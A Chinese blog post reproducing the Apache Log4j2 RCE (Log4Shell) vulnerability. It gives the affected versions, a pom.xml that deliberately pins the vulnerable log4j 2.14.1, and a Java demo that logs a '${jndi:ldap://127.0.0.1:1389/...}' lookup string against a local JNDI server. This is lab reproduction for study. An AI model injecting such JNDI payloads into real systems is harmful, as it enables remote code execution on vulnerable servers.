Apache-Log4j2-RCE漏洞复现

2021-12-11

字数统计: 757 | 阅读时长≈ 3 分钟

Apache-Log4j2-RCE漏洞复现

漏洞介绍

Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发，用来记录日志信息。大多数情况下，开发者可能会将用户输入导致的错误信息写入日志中。

此次漏洞触发条件为只要外部用户输入的数据会被日志记录，即可造成远程代码执行

影响版本

1	Apache Log4j 2.x <= 2.14.1

漏洞简析

由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。

复现过程

在IDEA中新建一个Maven项目，在pom.xml中导入依赖文件下载log4j程序包

pom.xml文件如下:

<dependencies>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
    </dependencies>

点击下载相应程序包资源

这里使用JNDI注入工具开启rmi服务或者idap服务执行本地命令，如下:

下面为测试Demo(由于我的jdk版本不适用RMI-JDNI注入，这里使用的是ldap协议)

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class Test {
    private static final Logger logger = LogManager.getLogger(Test.class);

    public static void main(String[] args) {
        logger.error("${jndi:ldap://127.0.0.1:1389/ehm23c}");
    }
}